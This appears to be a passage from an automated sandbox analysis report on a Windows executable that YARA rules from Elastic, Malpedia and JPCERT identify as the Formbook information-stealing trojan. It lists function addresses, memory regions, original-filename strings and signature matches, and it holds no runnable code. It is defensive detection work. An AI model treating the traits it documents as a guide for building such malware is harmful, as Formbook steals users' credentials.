          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CC7C03_2_010CC7C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EC6E03_2_010EC6E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E69623_2_010E6962
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D29A03_2_010D29A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0119A9A63_2_0119A9A6
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D28403_2_010D2840
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DA8403_2_010DA840
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B68B83_2_010B68B8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE8F03_2_010FE8F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118AB403_2_0118AB40
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01186BD73_2_01186BD7
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CEA803_2_010CEA80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116CD1F3_2_0116CD1F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DAD003_2_010DAD00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E8DBF3_2_010E8DBF
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010CADE03_2_010CADE0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0C003_2_010D0C00
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01170CB53_2_01170CB5
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C0CF23_2_010C0CF2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01172F303_2_01172F30
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01112F283_2_01112F28
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010F0F303_2_010F0F30
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01144F403_2_01144F40
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114EFA03_2_0114EFA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C2FC83_2_010C2FC8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118EE263_2_0118EE26
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D0E593_2_010D0E59
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118CE933_2_0118CE93
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E2E903_2_010E2E90
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118EEDB3_2_0118EEDB
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0119B16B3_2_0119B16B
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BF1723_2_010BF172
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0110516C3_2_0110516C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010DB1B03_2_010DB1B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D70C03_2_010D70C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117F0CC3_2_0117F0CC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011870E93_2_011870E9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118F0E03_2_0118F0E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118132D3_2_0118132D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010BD34C3_2_010BD34C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0111739A3_2_0111739A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D52A03_2_010D52A0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EB2C03_2_010EB2C0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011712ED3_2_011712ED
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010ED2F03_2_010ED2F0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011875713_2_01187571
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116D5B03_2_0116D5B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118F43F3_2_0118F43F
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C14603_2_010C1460
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118F7B03_2_0118F7B0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011156303_2_01115630
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011816CC3_2_011816CC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_011659103_2_01165910
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D99503_2_010D9950
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EB9503_2_010EB950
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0113D8003_2_0113D800
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D38E03_2_010D38E0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118FB763_2_0118FB76
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EFB803_2_010EFB80
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01145BF03_2_01145BF0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0110DBF93_2_0110DBF9
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118FA493_2_0118FA49
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01187A463_2_01187A46
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01143A6C3_2_01143A6C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01115AA03_2_01115AA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01171AA33_2_01171AA3
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0116DAAC3_2_0116DAAC
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0117DAC63_2_0117DAC6
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01181D5A3_2_01181D5A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D3D403_2_010D3D40
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01187D733_2_01187D73
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EFDC03_2_010EFDC0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_01149C323_2_01149C32
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118FCF23_2_0118FCF2
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118FF093_2_0118FF09
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D1F923_2_010D1F92
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0118FFB13_2_0118FFB1
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010D9EB03_2_010D9EB0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E73A2324_2_0E73A232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E734B324_2_0E734B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0E734B304_2_0E734B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7390364_2_0E739036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7300824_2_0E730082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7379124_2_0E737912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E731D024_2_0E731D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E73D5CD4_2_0E73D5CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90F2324_2_0E90F232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9050824_2_0E905082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90E0364_2_0E90E036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9125CD4_2_0E9125CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90C9124_2_0E90C912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E906D024_2_0E906D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E909B304_2_0E909B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E909B324_2_0E909B32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C9E4F65_2_04C9E4F6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA24465_2_04CA2446
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C944205_2_04C94420
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CB05915_2_04CB0591
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF05355_2_04BF0535
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0C6E05_2_04C0C6E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BEC7C05_2_04BEC7C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C147505_2_04C14750
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF07705_2_04BF0770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C820005_2_04C82000
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA81CC5_2_04CA81CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CB01AA5_2_04CB01AA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA41A25_2_04CA41A2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C781585_2_04C78158
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE01005_2_04BE0100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8A1185_2_04C8A118
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C702C05_2_04C702C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C902745_2_04C90274
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CB03E65_2_04CB03E6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFE3F05_2_04BFE3F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAA3525_2_04CAA352
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE0CF25_2_04BE0CF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C90CB55_2_04C90CB5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF0C005_2_04BF0C00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BEADE05_2_04BEADE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C08DBF5_2_04C08DBF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFAD005_2_04BFAD00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8CD1F5_2_04C8CD1F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAEEDB5_2_04CAEEDB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C02E905_2_04C02E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CACE935_2_04CACE93
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF0E595_2_04BF0E59
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAEE265_2_04CAEE26
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C6EFA05_2_04C6EFA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE2FC85_2_04BE2FC8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C64F405_2_04C64F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C32F285_2_04C32F28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C10F305_2_04C10F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C92F305_2_04C92F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BD68B85_2_04BD68B8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C1E8F05_2_04C1E8F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFA8405_2_04BFA840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF28405_2_04BF2840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF29A05_2_04BF29A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CBA9A65_2_04CBA9A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C069625_2_04C06962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BEEA805_2_04BEEA80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA6BD75_2_04CA6BD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAAB405_2_04CAAB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE14605_2_04BE1460
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAF43F5_2_04CAF43F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8D5B05_2_04C8D5B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA75715_2_04CA7571
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA16CC5_2_04CA16CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAF7B05_2_04CAF7B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C9F0CC5_2_04C9F0CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA70E95_2_04CA70E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAF0E05_2_04CAF0E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF70C05_2_04BF70C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BFB1B05_2_04BFB1B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CBB16B5_2_04CBB16B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C2516C5_2_04C2516C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BDF1725_2_04BDF172
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0B2C05_2_04C0B2C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF52A05_2_04BF52A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C912ED5_2_04C912ED
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0D2F05_2_04C0D2F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C3739A5_2_04C3739A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA132D5_2_04CA132D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BDD34C5_2_04BDD34C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFCF25_2_04CAFCF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C69C325_2_04C69C32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0FDC05_2_04C0FDC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA1D5A5_2_04CA1D5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA7D735_2_04CA7D73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF3D405_2_04BF3D40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF9EB05_2_04BF9EB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF1F925_2_04BF1F92
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB3FD25_2_04BB3FD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB3FD55_2_04BB3FD5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFFB15_2_04CAFFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFF095_2_04CAFF09
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF38E05_2_04BF38E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C5D8005_2_04C5D800
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0B9505_2_04C0B950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C859105_2_04C85910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BF99505_2_04BF9950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C9DAC65_2_04C9DAC6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C35AA05_2_04C35AA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C8DAAC5_2_04C8DAAC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C91AA35_2_04C91AA3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFA495_2_04CAFA49
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CA7A465_2_04CA7A46
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C63A6C5_2_04C63A6C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C65BF05_2_04C65BF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C2DBF95_2_04C2DBF9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04C0FB805_2_04C0FB80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04CAFB765_2_04CAFB76
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296E7A95_2_0296E7A9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296E5415_2_0296E541
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D5665_2_0296D566
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D9045_2_0296D904
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02959E505_2_02959E50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02959E4B5_2_02959E4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02952FB05_2_02952FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_02952D905_2_02952D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAA0365_2_04AAA036
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAE5CD5_2_04AAE5CD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA2D025_2_04AA2D02
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA10825_2_04AA1082
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA89125_2_04AA8912
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAB2325_2_04AAB232
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA5B325_2_04AA5B32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AA5B305_2_04AA5B30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C5EA12 appears 86 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C37E54 appears 99 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C25130 appears 58 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04BDB970 appears 262 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C6F290 appears 103 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 0114F290 appears 103 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 010BB970 appears 262 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 01105130 appears 58 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 01117E54 appears 99 times
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: String function: 0113EA12 appears 86 times
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
          Source: TU0kiz3mxz.exe, 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exe, 00000000.00000002.1698984998.00000000007AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exe, 00000000.00000000.1681136738.000000000033E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePpqg.exe8 vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exe, 00000000.00000002.1710158521.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: \[FileVersionLegalCopyrightOriginalFilenameInternalNameCompanyNameProductNameProductVersionFileDescription vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000003191000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exe, 00000003.00000002.1763936313.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TU0kiz3mxz.exe
          Source: TU0kiz3mxz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
